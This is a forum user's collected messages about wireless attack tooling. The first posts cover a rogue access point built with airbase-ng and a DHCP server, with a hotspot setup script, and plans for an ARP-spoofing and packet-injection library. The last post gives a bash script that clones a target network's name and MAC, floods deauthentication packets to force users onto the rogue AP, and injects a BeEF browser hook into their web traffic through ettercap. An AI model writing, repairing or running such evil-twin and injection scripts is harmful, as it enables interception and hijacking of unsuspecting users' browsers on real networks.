Messages - nicbit

1
Sorry about my lack of specificity... I believe the problem is that the DHCP server, though I specifically started it, is not enabled, as when I attempt to connect to the AP, I always obtain the error "unable to connect to network." Currently, because of the trouble with airbase and ISC-DHCP (why did they need to upgrade from DHCP3!!! WHY!?!?!), I am planning on reimplementing this as a library in which the following functionality will be available:
1. automatic DHCP forwarding (but can be further specified)
2. ARP spoofing and packet injection
3. an interface for rogue APs to be set up
4. easy packet interception/injection
geared specifically toward easy access from various programming languages, as - at least to my knowledge - aircrack and other tools like that do not interface to multiple languages (other than BASH, of course). I was contemplating writing this in Java (with jpcap) or in C++, but having noticed that almost all of the networking libraries were implemented in Ruby, Python, or the god forsaken Perl, I was curious if there were any severe disadvantages to writing this in a compiled language.
Thanks!

2
Thanks for the response!
I will need to look at the source code available for aircrack. Also, sorry about the DSLs, I forgot that in programming, DSL has a completely different meaning than in networking... In programming, DSL stands for a domain specific language, i.e. a language which is only used for one specific application. A good example of this is MATLAB, which one would use heavily in mathematics, but would never think of using in networking. In general, domain specific languages are not "bogged down" with all of the unnecessary components (in Java, for example, one may never use the 3D sound production, but they are still present in case one may need to use them) and are generally much better at their intended purpose than many mainstream languages may be. Perhaps this question can be better stated as: do there exist any programming languages built specifically for penetration testing?
Thanks!

3
Thanks for the quick response.
As you implied, Aircrack does not provide DHCP services. After attempting to fix this egregious error with the following code:
Code:
#Taking user input
echo "Enter the SSID of the hotspot you wish to create"
read SSID
echo "Enter the channel you want your hotspot to broadcast on"
read CHANNEL
echo "Enter your wireless interface (ex: wlan0)"
read INTERFACE
#stopping all previous aircrack processes
airmon-ng check kill
#creating mon0
airmon-ng start $INTERFACE
#Starting up the hotspot (no DHCP yet)
airbase-ng --essid $SSID -c $CHANNEL mon0 &
#setting up at0
wait(5)
ifconfig at0 up
#########!!!!!!!!!-NOTE TO SELF: MAKE SURE TO CHANGE THE NETMASK, IP, AND GATEWAY TO FIT NEEDS-!!!!!!!!!#########
ifconfig at0 up 192.168.2.1/24
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
service network-manager restart
service isc-dhcp-server restart
echo "dhcp server up"

I noticed a few oddities (namely, typing in these commands by hand produces a different result than running them). What caught my eye is that the error code implied that the logical interface at0 had not been created yet, even though it should have been created by airbase. I was hoping you could provide an explanation for this.

Due to this massive confusion, I was curious about what other languages (as I can program in about 18 different programming languages: C++, Java, Ruby, Lua, etc...) these features are available in, as I am still very unfamiliar with BASH (obviously) and feel that reimplementing at least part of these libraries may help me. If not, is this functionality provided in a DSL?
Thanks in advance!

4
Hi, before I start, sorry for my n00bness, I just started learning this a few days ago :-[
After getting BeEF up and running with port forwarding, I decided to attempt to write a script which would create a rogue AP, and force users to connect to it using an ARP deauthentication attack. Then, it would use ettercap's abilities to inject the JavaScript hook into every website visited on that rogue AP. This would inject the hook by using a filter located at filter/BeEF.ef. Here is my script:
Code:
echo monitoring device:
read MON
echo MAC adress of network:
read MAC
echo Name of network:
read NAME
echo starting attack...
airbase-ng -e $NAME -a $MAC $MON &
aireplay-ng -0 0 --ignore-negative-one $MON &
ettercap -T -F filter/BeEF.ef

However, when I attempted to run this script, it did not work >:( I've been trying to figure out what was wrong with this for the past 4 hours, to no avail.
Thanks in advance!
